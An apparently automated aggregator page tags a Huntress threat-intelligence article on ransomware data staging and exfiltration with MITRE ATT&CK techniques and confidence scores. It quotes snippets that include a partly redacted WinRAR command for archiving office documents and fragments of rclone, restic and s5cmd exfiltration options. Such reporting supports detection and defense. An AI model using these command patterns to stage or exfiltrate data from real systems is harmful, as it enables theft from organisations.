TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Exposing Data Exfiltration | Huntress

2025-08-19 · Read original ↗

ATT&CK techniques detected

15 predictions
T1560.001Archive via Utility
100%
"available tools, such as winrar, have also been observed being used by threat actors. two observed command lines appear as follows : winrar. exe a - m5 - v3g - tn365d - n *. bmp - n *. doc - n *. docx - n *. xls - n *. xlsx - n *. pdf - n *. txt - hp [ redacted ] " c : \ [ redact…"
T1048Exfiltration Over Alternative Protocol
86%
"is observed frequently enough that it ’ s often referred to as “... in preparation for data exfiltration … ”, rather than explicitly “ data staging ”. data exfiltration : lolbins, backup utilities, and rclone data exfiltration can occur in a number of ways. for example, huntress …"
T1048Exfiltration Over Alternative Protocol
65%
"exposing data exfiltration | huntress huntress frequently sees data staging and exfiltration activity, particularly with ransomware threat actors. these threat actors will collect, stage, and exfiltrate data prior to file encryption in order to engage in “ double extortion ” tact…"
T1567.002Exfiltration to Cloud Storage
62%
": different types of data staging and exfiltration techniques data staging : from archival tools to cloud storage sites very often, prior to data being exfiltrated out of an organization, it first has to be collected and staged. threat actors often stage data through the use of a…"
T1486Data Encrypted for Impact
60%
"tool is described on github as “ a high - performance command - line tool designed for interacting with s3 - compatible object storage and local filesystems. ” reviewing the options available at the github site, it appears to be a great option for copying files or “ objects ” fro…"
T1570Lateral Tool Transfer
59%
"tool is described on github as “ a high - performance command - line tool designed for interacting with s3 - compatible object storage and local filesystems. ” reviewing the options available at the github site, it appears to be a great option for copying files or “ objects ” fro…"
T1567.002Exfiltration to Cloud Storage
51%
"exfiltrating staged data via fzsftp. exe, filezilla ’ s sftp module. other observed methods of data exfiltration include the use of rclone for syncing files to the cloud, or backup utilities such as restic and backblaze. the following example command lines include restic being ob…"
T1048Exfiltration Over Alternative Protocol
48%
"- off event — huntress analysts observed a nearly identical s5cmd. exe command line during an incident that occurred five weeks prior to the incident described above. data exfiltration : detection challenges huntress ' 2025 cyber threat report found that in ransomware attacks, at…"
T1560.001Archive via Utility
43%
". * " - - keep - days 1826 - - allow - empty - source - - skip - hash - verification - - exclude - all - symlinks - - threads 30 very often, tools for data staging are used in close combination with data exfiltration tools. during a recent incident, huntress analysts observed the…"
T1074Data Staged
37%
": different types of data staging and exfiltration techniques data staging : from archival tools to cloud storage sites very often, prior to data being exfiltrated out of an organization, it first has to be collected and staged. threat actors often stage data through the use of a…"
T1560.001Archive via Utility
36%
": different types of data staging and exfiltration techniques data staging : from archival tools to cloud storage sites very often, prior to data being exfiltrated out of an organization, it first has to be collected and staged. threat actors often stage data through the use of a…"
T1080Taint Shared Content
34%
"tool is described on github as “ a high - performance command - line tool designed for interacting with s3 - compatible object storage and local filesystems. ” reviewing the options available at the github site, it appears to be a great option for copying files or “ objects ” fro…"
T1048.002Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
34%
"exposing data exfiltration | huntress huntress frequently sees data staging and exfiltration activity, particularly with ransomware threat actors. these threat actors will collect, stage, and exfiltrate data prior to file encryption in order to engage in “ double extortion ” tact…"
T1486Data Encrypted for Impact
31%
"- off event — huntress analysts observed a nearly identical s5cmd. exe command line during an incident that occurred five weeks prior to the incident described above. data exfiltration : detection challenges huntress ' 2025 cyber threat report found that in ransomware attacks, at…"
T1074.002Remote Data Staging
30%
": different types of data staging and exfiltration techniques data staging : from archival tools to cloud storage sites very often, prior to data being exfiltrated out of an organization, it first has to be collected and staged. threat actors often stage data through the use of a…"

Summary

Threat actors often steal data during the course of their attacks. This is particularly true for ransomware threat actors, who do it before deploying file encryption in order to engage in “double extortion” activities. This activity can be difficult to detect, particularly if it’s not dissimilar to legitimate actions taken by system administrators.